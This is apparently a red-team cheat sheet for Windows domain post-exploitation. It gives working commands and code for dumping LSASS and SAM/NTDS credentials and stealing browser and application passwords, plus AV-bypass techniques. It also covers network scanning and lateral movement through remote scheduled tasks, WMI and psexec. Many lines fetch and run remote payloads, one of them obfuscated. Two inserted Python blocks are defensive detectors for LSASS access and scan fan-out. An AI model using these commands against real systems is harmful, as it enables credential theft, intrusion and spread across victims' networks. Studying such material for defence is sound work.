>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.108/nishang/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
Dump hashes
>powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.100/nishang/Gather/Get-PassHashes.ps1');Get-PassHashes
>powershell -w hidden -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.107/ps/powersploit/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz" >C:\Users\Administrator.DC\Desktop\1123.txt

Batch hash dumping across hosts

Schtasks
Put the IP list in ip.txt. With one account and password, net use to every IP in the list; if the connection succeeds, copy getpass to the temp directory, then use the same credentials to create a scheduled task named windowsupdate that runs getpass daily at 00:00 as SYSTEM. After creating it, /run /tn runs the task immediately, the task is deleted, ping -n 10 >nul pauses for roughly 10 seconds, the result file is copied back locally, getpass is deleted and the connection is dropped.
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & schtasks /create /s "%i" /u "administrator" /p "password" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\getpass.exe" /sc DAILY /mo 1 /ST 00:00 /RU SYSTEM & schtasks /run /tn windowsupdate /s "%i" /U "administrator" /P "password" & schtasks /delete /F /tn windowsupdate /s "%i" /U " administrator" /P "password" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\debug\getpass.exe /F & net use \\%i\admin$ /del
Wmic
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy getpass.exe \\%i\admin$\temp\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\getpass.exe" & @ping 127.0.0.1 -n 10 >nul & move \\%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del \\%i\admin$\temp\getpass.exe /F & net use \\%i\admin$ /del

Direct use

>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
>privilege::debug
>misc::memssp
Lock the screen
>rundll32.exe user32.dll,LockWorkStation
The results are recorded in c:\windows\system32\mimilsa.log
>mimikatz log "privilege::debug" "lsadump::lsa /patch"
>mimikatz !privilege::debug
>mimikatz !token::elevate
>mimikatz !lsadump::sam

          Powershell Bypass

          >powershell -c " ('IEX '+'(Ne'+'w-O'+'bject Ne'+'t.W'+'ebClien'+'t).Do'+'wnloadS'+'trin'+'g'+'('+'1vchttp://'+'192.168.0'+'.101/'+'Inv'+'oke-Mimik'+'a'+'tz.'+'ps11v'+'c)'+';'+'I'+'nvoke-Mimika'+'tz').replace('1vc',[STRing][char]39)|IeX"

.net 2.0

Place katz.cs in C:\Windows\Microsoft.NET\Framework\v2.0.50727
Run in PowerShell
>$key = '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'
>$Content = [System.Convert]::FromBase64String($key)
>Set-Content key.snk -Value $Content -Encoding Byte
Run in cmd
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /r:System.EnterpriseServices.dll /out:katz.exe /keyfile:key.snk /unsafe katz.cs
>C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe katz.exe

          .net 4.0 Msbuild

          >C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild mimi.xml

          JScript

          >wmic os get /format:"mimikatz.xsl"
          >wmic os get /format:"http://192.168.0.107/ps/mimi.xsl"

Procdump64+mimikatz

>procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp
>procdump.exe -accepteula -ma lsass.exe lsass.dmp
>mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
>powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TheKingOfDuck/hashdump/master/procdump/procdump.ps1');Invoke-Procdump64 -Args '-accepteula -ma lsass.exe lsass.dmp'"

Dumpert

https://github.com/outflanknl/Dumpert
There are three variants: a DLL, an executable and a Cobalt Strike Aggressor script; the DLL and the exe are tested here.
The DLL is run with rundll32.exe C:\Outflank-Dumpert.dll,Dump
The dump is saved to c:\windows\temp\dumpert.dmp; load it in mimikatz
>sekurlsa::minidump c:\windows\temp\dumpert.dmp
>sekurlsa::logonpasswords
The executable can simply be run.

Dumping lsass with Cisco Jabber

>cd c:\program files (x86)\cisco systems\cisco jabber\x64\
>processdump.exe (ps lsass).id c:\temp\lsass.dmp

Bypassing Kaspersky

https://gist.github.com/xpn/c7f6d15bf15750eae3ec349e7ec2380e
Download the three files and compile them with Visual Studio; a few changes are needed:
(1) add #pragma comment(lib, "Rpcrt4.lib") (links the Rpcrt4.lib library)
(2) rename the .c file to .cpp (C++ code is used, so the extension must change)
(3) build for x64 to get the exe
In Visual Studio create an empty C++ project, set the configuration type to DLL, the character set to Unicode and the debugger to 64-bit. The DLL saves the dump to C:\\windows\\temp\\1.bin

#include <cstdio>
#include <windows.h>
#include <DbgHelp.h>
#include <iostream>
#include <string>
#include <map>
#include <TlHelp32.h>
#pragma comment(lib,"Dbghelp.lib")
using namespace std;

int FindPID()
{
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);
    HANDLE hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hProcessSnap == INVALID_HANDLE_VALUE) {
        cout << "CreateToolhelp32Snapshot Error!" << endl;
        return false;
    }
    BOOL bResult = Process32First(hProcessSnap, &pe32);
    while (bResult)
    {
        if (_wcsicmp(pe32.szExeFile, L"lsass.exe") == 0)
        {
            return pe32.th32ProcessID;
        }
        bResult = Process32Next(hProcessSnap, &pe32);
    }
    CloseHandle(hProcessSnap);
    return -1;
}

typedef HRESULT(WINAPI* _MiniDumpW)(DWORD arg1, DWORD arg2, PWCHAR cmdline);
typedef NTSTATUS(WINAPI* _RtlAdjustPrivilege)(ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG Enabled);

int dump()
{
    HRESULT             hr;
    _MiniDumpW          MiniDumpW;
    _RtlAdjustPrivilege RtlAdjustPrivilege;
    ULONG               t;
    MiniDumpW = (_MiniDumpW)GetProcAddress(LoadLibrary(L"comsvcs.dll"), "MiniDumpW");
    RtlAdjustPrivilege = (_RtlAdjustPrivilege)GetProcAddress(GetModuleHandle(L"ntdll"), "RtlAdjustPrivilege");
    if (MiniDumpW == NULL) {
        return 0;
    }
    // try enable debug privilege
    RtlAdjustPrivilege(20, TRUE, FALSE, &t);
    wchar_t ws[100];
    swprintf(ws, 100, L"%hd%hs", FindPID(), " C:\\windows\\temp\\1.bin full");
    MiniDumpW(0, 0, ws);
    return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        dump();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

>xxx.exe c:\xx\xx\xx.dll      (use an absolute path)

Remote LSASS dump: Physmem2profit

https://github.com/FSecureLABS/physmem2profit
Most security people use mimikatz to collect credentials, but current AV/EDR detects and kills it easily, so here mimikatz is not used on the server; the lsass process is dumped remotely instead.
Server side: build physmem2profit-public\server\ with Visual Studio.
Client side
>git clone --recurse-submodules https://github.com/FSecureLABS/physmem2profit.git
Install the client first
>bash physmem2profit/client/install.sh
The driver https://github.com/Velocidex/c-aff4/raw/master/tools/pmem/resources/winpmem/att_winpmem_64.sys must be uploaded to the target server; here it is placed in c:\windows\temp\
Run on the server
>Physmem2profit.exe --ip 192.168.0.98 --port 8888 --verbose
The IP here is the server's own IP.
Install the required modules on the attack machine, then run:
>source physmem2profit/client/.env/bin/activate
>cd physmem2profit/client
>python3 physmem2profit --mode all --host 192.168.0.98 --port 8888 --drive winpmem --install 'c:\windows\temp\att_winpmem_64.sys' --label test
The server side shows the connection.
Move the generated dmp file to a Windows system and use mimikatz to get the hashes; pypykatz can also be used on Linux.

One more command to dump the lsass process; it must be run as SYSTEM:
>rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <lsass pid> lsass.dmp full

SqlDumper+mimikatz

Located at C:\Program Files\Microsoft SQL Server\number\Shared
>tasklist /svc | findstr lsass.exe      (get the PID of lsass.exe)
>Sqldumper.exe ProcessID PID 0x01100    (write an mdmp file)
>mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
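Procdump, the comsvcs.dll MiniDump export, Dumpert and SqlDumper differ in how they reach LSASS but not in what they need: a process handle with PROCESS_VM_READ. Sysmon Event ID 10 (ProcessAccess) records that handle request with the source image, the granted access mask and the call trace, so the detection does not depend on which tool was used. The following is an added example, not part of the original notes and not from any tool they mention: it evaluates constructed Event ID 10 records against the access mask, a small source-image allowlist and the presence of comsvcs.dll in the call trace. The sample records and the allowlist are assumptions made for the example.

```python
PROCESS_VM_READ = 0x0010   # handle right required to read another process's memory

# Hypothetical allowlist of images that routinely open LSASS with read rights; tune per fleet.
ALLOWLIST = {
    r"c:\windows\system32\wbem\wmiprvse.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}

LSASS = r"C:\Windows\System32\lsass.exe"

# Constructed Sysmon Event ID 10 fields, not real telemetry.
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "TargetImage": LSASS, "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2a5f6"},
    {"SourceImage": r"C:\Tools\procdump64.exe", "TargetImage": LSASS, "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2a5f6|C:\Tools\procdump64.exe+1a2b3"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": LSASS, "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Windows\System32\KERNELBASE.dll+2a5f6|C:\Windows\System32\comsvcs.dll+3f0c2"},
    {"SourceImage": r"C:\Program Files\Microsoft SQL Server\150\Shared\SqlDumper.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|C:\Program Files\Microsoft SQL Server\150\Shared\SqlDumper.exe+4d10"},
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS, "GrantedAccess": "0x1000",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4"},                      # query-limited only, cannot read memory
    {"SourceImage": r"C:\Windows\explorer.exe", "TargetImage": r"C:\Windows\explorer.exe", "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4"},                      # target is not LSASS
]


def evaluate(event):
    """Return a finding dict for a suspicious LSASS access, else None."""
    if not event["TargetImage"].lower().endswith("\\lsass.exe"):
        return None
    mask = int(event["GrantedAccess"], 16)
    if not mask & PROCESS_VM_READ:
        return None                      # the handle cannot read memory, so it cannot dump it
    if event["SourceImage"].lower() in ALLOWLIST:
        return None
    reasons = ["PROCESS_VM_READ granted on lsass.exe to a non-allowlisted image"]
    if "comsvcs.dll" in event.get("CallTrace", "").lower():
        reasons.append("comsvcs.dll MiniDump in the call trace")
    return {"source": event["SourceImage"], "access": hex(mask), "reasons": reasons}


def triage(events):
    return [finding for finding in map(evaluate, events) if finding]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The mask check matters more than the image name: a renamed procdump still needs 0x10 in the granted access, while an allowlist keyed on paths alone is trivially bypassed by copying a binary. Where the volume of benign 0x1010/0x1410 opens from management agents is high, keep the allowlist small and add the call trace (an unbacked or non-system module in the stack) as the second condition rather than raising the mask threshold.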

Mimipenguin

Dumps hashes on Linux; requires root. https://github.com/huntergregal/mimipenguin

Extracting cached hashes

Registry

>reg save hklm\sam c:\sam.hive & reg save hklm\system c:\system.hive & reg save hklm\security c:\security.hive
>mimikatz.exe "lsadump::sam /system:sys.hive /sam:sam.hive" exit

Ninjacopy

#http://192.168.0.101/powersploit/Exfiltration/Invoke-NinjaCopy.ps1
>powershell -exec bypass
>Import-Module .\invoke-ninjacopy.ps1
>Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
>Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -ComputerName "dc.zone.com" -LocalDestination "C:\Windows\Temp\1.dit"

Quarks-pwdump

>quarks-pwdump.exe --dump-hash-domain

Domain hash extraction

Ntdsutil

>ntdsutil
>snapshot
>activate instance ntds
>create
>mount {guid}
>copy <mount point>\windows\NTDS\ntds.dit d:\ntds_save.dit
>unmount {guid}
>delete {guid}
>quit
&
Create
>ntdsutil snapshot "activate instance ntds" create quit quit
Mount
>ntdsutil snapshot "mount {guid}" quit quit
Copy
>copy c:\$SNAP_XXX_VOLUMEC$\windows\NTDS\ntds.dit d:\ntds_save.dit
Unmount and delete
>ntdsutil snapshot "unmount {guid}" "delete {guid}" quit quit
Check after deletion
>ntdsutil snapshot "List All" quit quit
Extract the hashes
>QuarksPwDump -dump-hash-domain -ntds-file d:\ntds_save.dit

Vssadmin

Create a shadow copy of the C: volume
>vssadmin create shadow /for=c:
Copy ntds.dit
>copy {Shadow Copy Volume Name}\windows\NTDS\ntds.dit c:\ntds.dit
Delete the shadow copy
>vssadmin delete shadows /for=c: /quiet

Impacket

secretsdump.py from Impacket
#impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
or
#impacket-secretsdump -hashes xxx:xxx -just-dc xxx.com/admin\@192.168.1.1

NTDSDumpex

>Invoke-NinjaCopy -Path "c:\windows\ntds\ntds.dit" -LocalDestination "C:\Windows\Temp\1.dit"
>reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM.hive
https://github.com/zcgonvh/NTDSDumpEx
>NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

Vssadmin via WMI

>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
>wmic /node:dc /user:xxxx\admin /password:passwd process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1"
>copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
PS C:\Users\test.PENTESTLAB> copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

PowerSploit

PS >Import-Module .\VolumeShadowCopyTools.ps1
PS >New-VolumeShadowCopy -Volume C:\
PS >Get-VolumeShadowCopy

Nishang

PS >Import-Module .\Copy-VSS.ps1
PS >Copy-VSS
PS >Copy-VSS -DestinationDir C:\ShadowCopy\
or from MSF
Meterpreter>load powershell
Meterpreter>powershell_import /root/Copy-VSS.ps1
Meterpreter>powershell_execute Copy-VSS

Mimikatz

#lsadump::dcsync /domain:xxx.com /all /csv
or
#privilege::debug
#lsadump::lsa /inject

MSF

#use auxiliary/admin/smb/psexec_ntdsgrab
#set rhost smbdomain smbuser smbpass
#exploit
The ntds.dit file is saved under /root/.msf4/loot
Post-exploitation module
#use windows/gather/credentials/domain_hashdump
#set session 1

laZagne

Windows

https://github.com/AlessandroZ/LaZagne
>laZagne.exe all -oN      (collect all passwords and write them to a file)
PowerShell
PS>[Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
PS>$vault = New-Object Windows.Security.Credentials.PasswordVault
PS>$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Linux

>python3 laZagne.py all

Sensitive information

Seatbelt

Build with Visual Studio
>Seatbelt.exe ALL      (collect everything)

VNC passwords

>reg query HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server /v password
Decrypt with http://www.cqure.net/wp/tools/password-recovery/vncpwdump/
>vncpwdump.exe -k hash

Navicat information

>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v host
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v UserName
>reg query HKEY_CURRENT_USER\SOFTWARE\PremiumSoft\Navicat\Servers /s /v pwd
Offline decryption: https://github.com/HyperSine/how-does-navicat-encrypt-password

Passwords saved in Chrome

>mimikatz dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

Foxmail

X:\Foxmail\storage\xxx\Accounts\Account.rec0
Decrypt with Foxmail Password Decryptor: https://securityxploded.com/foxmail-password-decryptor.php

Passwords saved in Firefox

https://www.nirsoft.net/password_recovery_tools.html
>webbrowserpassview.exe /LoadPasswordsFirefox 1 /shtml "c:\1.html"
or
>dir %appdata%\Mozilla\Firefox\Profiles\
>dir %appdata%\Mozilla\Firefox\Profiles\yn80ouvt.default
The firefox.exe process must be terminated first.
Compress
>7z.exe -r -padmin123 a c:\users\public\firefox.7z C:\Users\Administrator\AppData\Roaming\Mozilla\*.*
https://github.com/unode/firefox_decrypt
https://securityxploded.com/firefox-master-password-cracker.php

SecureCRT

The config folder under C:\Documents and Settings\Administrator\Application Data\VanDyke
C:\program files\Vandyke software\securecrt\
https://github.com/uknowsec/SharpDecryptPwd

Lateral movement

Discovering live hosts

For + ping to find live hosts

>for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.0.%I |findstr "TTL="
For + ping to resolve domain names to IPs
>for /f "delims=" %i in (D:/domains.txt) do @ping -w 1 -n 1 %i | findstr /c:"[192." >> c:/windows/temp/ds.txt

Mapping external assets to internal ones

1. Save the collected subdomains and ping them in a loop from inside the network
for /f "delims=" %i in (host.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> C:/users/public/out.txt
2. Find the DNS server IP with ipconfig, or scan for machines with port 53 open
https://github.com/Q2h1Cg/dnsbrute
dnsbrute.exe -domain a.com -dict ziyuming.txt -rate 1000 -retry 1 -server 192.168.1.1:53
3. Scan internal IPs for web services and collect their titles

NbtScan

Windows
>nbtscan.exe -m 192.168.1.0/24
Linux
#nbtscan -r 192.168.0.0/24

NMAP

#nmap -Pn -open -A -n -v -iL filename.txt
-Pn: skip host discovery
-n: no DNS resolution
-open: show only open ports
-A: during the scan, press Enter to see the progress
-v: verbose output
-F: fast scan of the 100 most common ports
-p: ports to scan, e.g. -p1-65535 (full port scan, no spaces)
-iL: read the targets to scan from a file
-sV: probe open ports for service and version information
-T: timing template, T3 by default; use -T4 for a faster scan
Live hosts
>nmap -sP -PI 192.168.0.0/24
>nmap -sn -PE -T4 192.168.0.0/24
>nmap -sn -PR 192.168.0.0/24
nmap through a proxy
meterpreter > background
msf > use auxiliary/server/socks4a
then configure proxychains.conf
#proxychains nmap -sT -sV -Pn -n -p22,80,135,139,445 --script=smb-vuln-ms08-067.nse <internal IP>

NetDiscover

#netdiscover -r 192.168.0.0/24 -i wlan0

arp-scan

kali
>arp-scan --interface=wlan0 --localnet
Windows
>arp-scan.exe -t 192.168.0.0/24

MSF

#use auxiliary/scanner/discovery/arp_sweep
#use auxiliary/scanner/discovery/udp_sweep
#use auxiliary/scanner/netbios/nbname
meterpreter>run post/windows/gather/arp_scanner RHOSTS=192.168.1.1/24
meterpreter>run post/multi/gather/ping_sweep RHOSTS=192.168.1.1/24

Probing services & ports

Common ports

Service        Port
Mssql          1433
SMB            445
WMI            135
winrm          5985
rdp            3389
ssh            22
oracle         1521
mysql          3306
redis          6379
postgresql     5432
ldap           389
smtp           25
pop3           110
imap           143
exchange       443
vnc            5900
ftp            21
rsync          873
mongodb        27017
telnet         23
svn            3690
java rmi       1099
couchdb        5984
pcanywhere     5632
web            80-90, 8000-10000, 7001, 9200, 9300

Powershell

Powersploit
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/powersploit/Recon/Invoke-Portscan.ps1'); Invoke-Portscan -Hosts 192.168.0.0/24 -T 4 -Ports '1-65535' -oA C:\TEMP.txt"
Nishang
>powershell.exe -nop -exec bypass -c "IEX(New-Object net.webclient).DownloadString('http://192.168.0.107/ps/nishang/Scan/Invoke-PortScan.ps1'); Invoke-Portscan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort"
Without -ScanPort it only checks which hosts are alive

SMB

https://github.com/ShawnDEvans/smbmap
MSF
#use auxiliary/scanner/smb/smb_version      (find hosts with 139/445 open)
#use auxiliary/scanner/smb/smb_login        (brute force)
NMAP
#nmap -sU -sS --script smb-enum-shares.nse -p 445 192.168.1.119
CMD
>for /l %a in (1,1,254) do start /min /low telnet 192.168.1.%a 445

Linux Samba

Usually port 139; connect with weak credentials
>smbclient -L 192.168.0.110
>smbclient '\\192.168.0.110\IPC$'
#use exploit/linux/samba/is_known_pipename

MSF

Ports
#use auxiliary/scanner/portscan/tcp
#use auxiliary/scanner/portscan/ack
Services
#use auxiliary/scanner/ftp/ftp_version          hosts running FTP
#use auxiliary/scanner/ftp/anonymous            FTP servers that allow anonymous login
#use auxiliary/scanner/ftp/ftp_login            FTP brute force
#use auxiliary/scanner/http/http_version        hosts running HTTP
#use auxiliary/scanner/smb/smb_version          hosts running SMB
#use auxiliary/scanner/smb/smb_enumshares       SMB shares that allow anonymous access
#use auxiliary/scanner/smb/smb_login            SMB brute force
#use auxiliary/scanner/ssh/ssh_version          hosts running SSH
#use auxiliary/scanner/ssh/ssh_login            SSH brute force
#use auxiliary/scanner/telnet/telnet_version    hosts running TELNET
#use auxiliary/scanner/telnet/telnet_login      TELNET brute force
#use auxiliary/scanner/mysql/mysql_version      hosts running MYSQL
#use auxiliary/scanner/mysql/mysql_login        MYSQL brute force
#use auxiliary/scanner/mssql/mssql_ping         hosts running SQL Server
#use auxiliary/scanner/mssql/mssql_login        MSSQL brute force
#use auxiliary/scanner/postgres/postgres_version   hosts running PostgreSQL
#use auxiliary/scanner/postgres/postgres_login  POSTGRESQL brute force
#use auxiliary/scanner/oracle/tnslsnr_version   hosts running Oracle
#use auxiliary/admin/oracle/oracle_login        Oracle brute force
#use auxiliary/scanner/http/title               HTTP title scan
#use auxiliary/scanner/rdp/rdp_scanner          hosts running RDP
#use auxiliary/scanner/http/webdav_scanner
#use auxiliary/scanner/http/http_put            hosts with WEBDAV enabled
#use auxiliary/scanner/smb/smb_ms17_010         hosts vulnerable to MS17-010
#use auxiliary/scanner/http/zabbix_login        zabbix brute force
#use auxiliary/scanner/http/axis_login          axis brute force
#use auxiliary/scanner/redis/redis_login        redis brute force

Nc

>nc -znv 192.168.0.98 1-65535
>nc -v -w 1 192.168.0.110 -z 1-1000
>for i in {101..102}; do nc -vv -n -w 1 192.168.0.$i 21-25 -z; done

Masscan

$sudo apt-get install clang git gcc make libpcap-dev
$git clone https://github.com/robertdavidgraham/masscan
$cd masscan
$make
>masscan -p80,3389,1-65535 192.168.0.0/24

PTScan

Friendly web service identification: https://github.com/phantom0301/PTscan/blob/master/PTscan.py
>python PTscan.py {-f /xxx/xxx.txt or -h 192.168.1} [-p 21,80,3306] [-m 50] [-t 10] [-n (no ping)] [-b (banner scan)] [-r (look up IP)]
Ports: 80,81,82,83,84,85,86,87,88,89,90,91,901,18080,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,443,8443,7001

CobaltStrike + K8 Aggressor

https://github.com/k8gege/Aggressor
Live hosts
beacon>Cscan 192.168.0.0/24 OnlinePC
MS17010
beacon>Cscan 192.168.0.0/24 MS17010
OS information
beacon>Cscan 192.168.0.0/24 Osscan
Internal site banner and title scan
beacon>Cscan 192.168.0.0/24 WebScan
FTP brute force
Upload the user.txt and pass.txt credential files to the beacon's directory (beacon>pwd)
beacon>Cscan 192.168.0.0/24 FtpScan
WMI brute force of Windows accounts
Upload the user.txt and pass.txt credential files to the beacon's directory (beacon>pwd)
beacon>Cscan 192.168.0.0/24 WmiScan
Cisco device scan
beacon>Cscan 192.168.0.0/24 CiscoScan
Enumerate shares
beacon> EnumShare
Enumerate SQL Server databases
beacon> EnumMSSQL
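Whatever tool does the discovery above (the for/ping loops, nmap -sn, masscan, the Cscan modules), the traffic has one of two shapes: one source touching many destination hosts, or one source touching many ports on one destination, in a short time. Flow records (NetFlow, Zeek conn.log, firewall logs) expose both without any payload inspection. The following is an added example, not part of the original notes and not from any tool they mention: it bins constructed flow records into tumbling windows per source and raises an alert when the distinct-host or distinct-port count in a window crosses a threshold. The flow records, window length and thresholds are assumptions made for the example.

```python
from collections import defaultdict

# Constructed flow records: (timestamp_seconds, src, dst, proto, dst_port). Not real traffic.
SAMPLE_FLOWS = (
    [(t, "10.1.1.50", "192.168.0.%d" % (t + 1), "icmp", 0) for t in range(60)]        # ping sweep: 60 hosts in 60 s
    + [(120 + i, "10.1.1.60", "192.168.0.10", "tcp", 1 + i) for i in range(40)]      # 40 ports on one host
    + [(200 + i, "10.1.1.70", "192.168.0.20", "tcp", 443) for i in range(50)]         # normal: one service, repeatedly
)


def detect(flows, window=60, host_threshold=20, port_threshold=20):
    """Fan-out detection over tumbling windows of `window` seconds. Returns a list of alerts."""
    dsts = defaultdict(set)    # (src, window index) -> distinct destination hosts
    ports = defaultdict(set)   # (src, dst, window index) -> distinct destination ports
    for ts, src, dst, proto, dport in flows:
        w = ts // window
        dsts[(src, w)].add(dst)
        if proto != "icmp":    # ICMP has no port; it only counts toward the host sweep
            ports[(src, dst, w)].add(dport)

    alerts = []
    for (src, w), hosts in dsts.items():
        if len(hosts) >= host_threshold:
            alerts.append({"type": "host_sweep", "src": src, "window_start": w * window, "hosts": len(hosts)})
    for (src, dst, w), ps in ports.items():
        if len(ps) >= port_threshold:
            alerts.append({"type": "port_scan", "src": src, "dst": dst, "window_start": w * window, "ports": len(ps)})
    return sorted(alerts, key=lambda a: (a["window_start"], a["type"]))


if __name__ == "__main__":
    for alert in detect(SAMPLE_FLOWS):
        print(alert)
```

Tumbling windows are cheap but a scan straddling a boundary can split below both thresholds; a sliding window or a per-source running count fixes that at the cost of state. Monitoring tools, vulnerability scanners and domain controllers legitimately fan out, so key an allowlist on the source address, not on the destination count.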

Command execution & IPC & scheduled tasks

Establish a connection
>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator
List connections
>net use
List files
>dir \\192.168.1.2\c$
Check the system time
>net time \\192.168.1.2
Upload a file
>copy 1.exe \\192.168.1.2\c$
Download a file
>copy \\192.168.1.2\c$\1.exe 1.exe
Batch IPC
@echo off
echo check ip addr config file...
if not exist ip.txt echo ip addr config file ip.txt does not exist! & goto end
echo read and analysis file...
for /F "eol=#" %%i in (ip.txt) do start PsExec.exe \\%%i -accepteula -u administrator -p "123456" cmd & start cmd /c PsExec.exe \\%%i -u administrator -p "123456" cmd
:end
exit

AT

>net use \\192.168.1.2\ipc$ "password" /user:domain\administrator
>copy 1.exe \\192.168.1.2\c$
>net time \\192.168.1.2
>at \\192.168.1.2 1:00AM c:\1.exe
>at \\192.168.1.2 1:00AM cmd.exe /c "ipconfig >c:/1.txt"
>type \\192.168.1.2\c$\1.txt
List scheduled tasks
>at \\192.168.1.2
Delete a scheduled task
>at \\192.168.1.2 <job id> /delete
Batch lateral execution
>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f http://youip.com:80/shell.txt c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@10.1.1.1 "c:/windows/debug/SysDug.exe"
>atexec.exe ./administrator:pass@10.1.1.1 "certutil.exe -urlcache -split -f c:/windows/debug/SysDug.exe delete"

Schtasks

>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
>schtasks /query /fo LIST /v      (list scheduled tasks)
Upload the file
>copy ok.exe \\192.168.0.55\c$\windows\temp
Create a scheduled task remotely
>schtasks /create /s "192.168.0.55" /u "admin" /p "qqq23" /RL HIGHEST /F /tn "windowsupdate" /tr "c:\windows\temp\ok.exe" /sc DAILY /mo 1 /ST 20:28 /RU SYSTEM
Query the task created remotely
>schtasks /query /s "192.168.0.55" /U "admin" /P "qqq23" | findstr "windowsupdate"
Run the remote task immediately
>schtasks /run /tn windowsupdate /s "192.168.0.55" /U "admin" /P "qqq23"
Delete the scheduled task
>schtasks /delete /tn windowsupdate /F /s "192.168.0.55" /u "admin" /p "qqq23"
Delete the IPC connection
>net use \\192.168.0.55\ipc$ /del /y
Batch lateral execution
>for /f %i in (ip.txt) do net use \\%i\admin$ /user:"administrator" "password" & if %errorlevel% equ 0 ( copy ok.exe \\%i\admin$\debug\ /Y ) & wmic /NODE:"%i" /user:"administrator" /password:"password" PROCESS call create "c:\windows\debug\ok.exe" & @ping 127.0.0.1 -n 8 >nul & net use \\%i\admin$ /del

WMIC

>net use \\192.168.0.55\ipc$ "password" /user:"domain\administrator"
>copy ok.exe \\192.168.0.55\c$\windows\temp
>wmic /NODE:"192.168.0.55" /user:"administrator" /password:"password" PROCESS call create "c:\windows\temp\ok.exe"
>del \\192.168.0.55\c$\windows\temp\ok.exe /F
>net use \\192.168.0.55\c$ /del

Quickly locating machines a domain admin has logged on to

>psexec -accepteula @ips.txt -u admin -p pass@123 -c 1.bat
#1.bat content
tasklist /v | find "<domain admin name>"
@echo off
echo check ip addr config file...
